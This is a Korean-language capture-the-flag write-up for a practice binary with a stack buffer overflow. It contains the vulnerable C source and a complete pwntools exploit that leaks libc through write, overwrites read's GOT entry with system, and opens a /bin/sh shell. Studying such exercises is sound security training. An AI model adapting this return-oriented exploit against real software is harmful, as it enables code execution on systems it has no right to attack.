basic_rop_x86

[소스코드]

#include <stdio.h>

#include <stdlib.h>

#include <signal.h>

#include <unistd.h>

void alarm_handler() {

    puts("TIME OUT");

    exit(-1);

}

void initialize() {

    setvbuf(stdin, NULL, _IONBF, 0);

    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);

    alarm(30);

}

int main(int argc, char *argv[]) {

    char buf[0x40] = {};

    initialize();

    read(0, buf, 0x400);

    write(1, buf, sizeof(buf));

    return 0;

}

 

[exploit]

*유념할 점: x64 아키텍처에서는 함수의 인자를 레지스터에 저장하여 사용하지만, x86 아키텍처에서는 함수의 인자를 stack에 푸쉬하여 사용한다.

exploit payload를 보낸 후 스택의 모습

from pwn import *
context.arch = 'i386'
p = process("./basic_rop_x86")
e = ELF("./basic_rop_x86")
l = ELF("./libc.so.6")

read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
pop = 0x804868b
pop2 = 0x804868a
pop3 = 0x8048689

buf = b'A'*64
payload = b'A'*68 + b'B'*4
payload += p32(write_plt) + p32(pop3) + p32(1) + p32(read_got) + p32(4) # (1) write(1, read_got, 4) == get addr of read()
payload += p32(read_plt) + p32(pop3) + p32(0) + p32(read_got) + p32(12) # (2) read(0, read_got, 12) == GOT Overwrite & overwrite [read_got+0x4]
payload += p32(read_plt) + p32(pop) + p32(read_got+0x4) # (3) read("/bin/sh") == system("/bin/sh")

p.send(payload)
p.recvuntil(buf)
read = u32(p.recvn(4))
libc_base = read - l.symbols['read']
system = libc_base + l.symbols['system']

print('read:', hex(read))
print('libc_base:', hex(libc_base))
print('system:', hex(system))

p.send(p32(system) + b'/bin/sh\x00') # (2) GOT Overwrite(read()->system()) + send "/bin/sh" to [read_got+0x4]

p.interactive()